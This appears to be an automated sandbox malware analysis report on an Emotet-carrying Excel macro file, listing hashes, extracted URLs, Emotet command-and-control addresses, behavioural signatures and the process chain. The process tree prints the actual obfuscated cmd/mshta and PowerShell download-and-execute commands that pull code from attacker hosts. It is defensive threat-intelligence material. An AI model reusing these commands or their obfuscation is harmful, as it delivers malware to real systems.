Analysis
-
max time kernel
152s -
max time network
136s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
19-01-2022 07:28
Behavioral task
behavioral1
Sample
d145d8bd97ef82aed65a01e30b7523f9380bdef7e4af3cbb706c3fe571d2accb.xlsm
Resource
win10-en-20211208
General
-
Target
d145d8bd97ef82aed65a01e30b7523f9380bdef7e4af3cbb706c3fe571d2accb.xlsm
-
Size
114KB
-
MD5
f8ecaf3d4168b075f418c121a763ae0f
-
SHA1
cd99515256f845d4b6ca4f8a4f5ff6d0f1d0eff3
-
SHA256
d145d8bd97ef82aed65a01e30b7523f9380bdef7e4af3cbb706c3fe571d2accb
-
SHA512
bb37a13fdef41887f119faf79af415cb14a894f9b5ef757a7be9a665afcd0df5a491b6b4a4bf0ed46c5e6b6a0dcd247ad52e1f94b4567d1287d319ed7459ce60
Malware Config
Extracted
http://0x5cff39c3/sec/sec.html
Extracted
http://92.255.57.195/sec/sec.png
Extracted
emotet
Epoch5
45.138.98.34:80
69.16.218.101:8080
51.210.242.234:8080
185.148.168.220:8080
142.4.219.173:8080
54.38.242.185:443
191.252.103.16:80
104.131.62.48:8080
62.171.178.147:8080
217.182.143.207:443
168.197.250.14:80
37.44.244.177:8080
66.42.57.149:443
210.57.209.142:8080
159.69.237.188:443
116.124.128.206:8080
128.199.192.135:8080
195.154.146.35:443
185.148.168.15:8080
195.77.239.39:8080
207.148.81.119:8080
85.214.67.203:8080
190.90.233.66:443
78.46.73.125:443
78.47.204.80:443
37.59.209.141:8080
54.37.228.122:443
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2572 2752 cmd.exe EXCEL.EXE -
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 5 IoCs
Processes:
mshta.exepowershell.exerundll32.exeflow pid process 29 1028 mshta.exe 43 2680 powershell.exe 45 2680 powershell.exe 50 3756 rundll32.exe 51 3756 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
Processes:
rundll32.exerundll32.exepid process 2112 rundll32.exe 2484 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Tacmnymkkasivcq\tudzi.bfk rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3820 1028 WerFault.exe mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2752 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
powershell.exeWerFault.exerundll32.exepid process 2680 powershell.exe 2680 powershell.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 2680 powershell.exe 3756 rundll32.exe 3756 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeWerFault.exedescription pid process Token: SeDebugPrivilege 2680 powershell.exe Token: SeDebugPrivilege 3820 WerFault.exe -
Suspicious use of SetWindowsHookEx 20 IoCs
Processes:
EXCEL.EXEpid process 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE 2752 EXCEL.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
EXCEL.EXEcmd.exemshta.exepowershell.execmd.exerundll32.exerundll32.exerundll32.exedescription pid process target process PID 2752 wrote to memory of 2572 2752 EXCEL.EXE cmd.exe PID 2752 wrote to memory of 2572 2752 EXCEL.EXE cmd.exe PID 2572 wrote to memory of 1028 2572 cmd.exe mshta.exe PID 2572 wrote to memory of 1028 2572 cmd.exe mshta.exe PID 1028 wrote to memory of 2680 1028 mshta.exe powershell.exe PID 1028 wrote to memory of 2680 1028 mshta.exe powershell.exe PID 2680 wrote to memory of 64 2680 powershell.exe cmd.exe PID 2680 wrote to memory of 64 2680 powershell.exe cmd.exe PID 64 wrote to memory of 2112 64 cmd.exe rundll32.exe PID 64 wrote to memory of 2112 64 cmd.exe rundll32.exe PID 64 wrote to memory of 2112 64 cmd.exe rundll32.exe PID 2112 wrote to memory of 2484 2112 rundll32.exe rundll32.exe PID 2112 wrote to memory of 2484 2112 rundll32.exe rundll32.exe PID 2112 wrote to memory of 2484 2112 rundll32.exe rundll32.exe PID 2484 wrote to memory of 828 2484 rundll32.exe rundll32.exe PID 2484 wrote to memory of 828 2484 rundll32.exe rundll32.exe PID 2484 wrote to memory of 828 2484 rundll32.exe rundll32.exe PID 828 wrote to memory of 3756 828 rundll32.exe rundll32.exe PID 828 wrote to memory of 3756 828 rundll32.exe rundll32.exe PID 828 wrote to memory of 3756 828 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\d145d8bd97ef82aed65a01e30b7523f9380bdef7e4af3cbb706c3fe571d2accb.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/sec.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\system32\mshta.exemshta http://0x5cff39c3/sec/sec.html3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/sec.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString5⤵
- Suspicious use of WriteProcessMemory
PID:64 -
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Tacmnymkkasivcq\tudzi.bfk",SMtTHDWQvB8⤵
- Suspicious use of WriteProcessMemory
PID:828 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Tacmnymkkasivcq\tudzi.bfk",DllRegisterServer9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:3756 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1028 -s 16604⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3820
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
887fff1f67c59bd1a47f8946e7a8a02b
SHA17605eeff4092d746c62d8fca63a2b785bc56ea4c
SHA2565fbac6c91e83364b379e8ad4d6b9be86216a7db84fe8b2297a2b1e21e490b971
SHA512d7b7a8be2b726e5de12d148a2b4b677e4e55dc43e9cde55d0edfbfad7407cf0a72871cdb8a7444df7a2c0fac734dcf5be53999c084c0f03ac31f603c0c91b2f8
-
MD5
887fff1f67c59bd1a47f8946e7a8a02b
SHA17605eeff4092d746c62d8fca63a2b785bc56ea4c
SHA2565fbac6c91e83364b379e8ad4d6b9be86216a7db84fe8b2297a2b1e21e490b971
SHA512d7b7a8be2b726e5de12d148a2b4b677e4e55dc43e9cde55d0edfbfad7407cf0a72871cdb8a7444df7a2c0fac734dcf5be53999c084c0f03ac31f603c0c91b2f8
-
MD5
887fff1f67c59bd1a47f8946e7a8a02b
SHA17605eeff4092d746c62d8fca63a2b785bc56ea4c
SHA2565fbac6c91e83364b379e8ad4d6b9be86216a7db84fe8b2297a2b1e21e490b971
SHA512d7b7a8be2b726e5de12d148a2b4b677e4e55dc43e9cde55d0edfbfad7407cf0a72871cdb8a7444df7a2c0fac734dcf5be53999c084c0f03ac31f603c0c91b2f8